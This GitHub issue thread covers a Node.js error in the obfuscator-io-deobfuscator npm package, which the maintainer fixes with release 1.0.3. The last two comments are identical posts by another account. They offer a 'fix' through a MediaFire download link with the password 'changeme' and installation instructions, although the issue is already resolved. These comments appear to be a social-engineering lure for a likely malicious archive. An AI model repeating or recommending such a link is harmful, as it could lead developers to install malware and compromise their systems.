### ISSUE TITLE
Error while running in nodejs

### ISSUE THREAD

**Issue by lianlilin** [ben-sb/obfuscator-io-deobfuscator#37]
This is my source code
https://github.com/lianlilin/codedemo/blob/main/demo.js

I can get the correct result in the web tool, but not in nodejs, this makes me confused.

`[2024-08-29T10:09:01.448Z]: Starting pass 1
[2024-08-29T10:09:01.451Z]: Executing UnusedVariableRemover
TypeError: Cannot read properties of undefined (reading 'buildError')
   ...
TypeError: Cannot read properties of undefined (reading 'parseExpression')
  ...
TypeError: Cannot read properties of undefined (reading 'parseExpression')
 `

**Comment by lianlilin** [comment]
This is my package.json

`{
  "name": "testdemo",
  "version": "1.0.0",
  "type": "module",
  "description": "",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "keywords": [],
  "author": "",
  "license": "ISC",
  "dependencies": {
    "fs-extra": "^11.2.0",
    "obfuscator-io-deobfuscator": "^1.0.2"
  }
}
`

**Comment by ben-sb** [comment]
Were you using it via the npm module? If so please update it and try again, I've released a new version 1.0.3

**Comment by lianlilin** [comment]
Thank you for your prompt handling. The new version seems to be working fine now.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
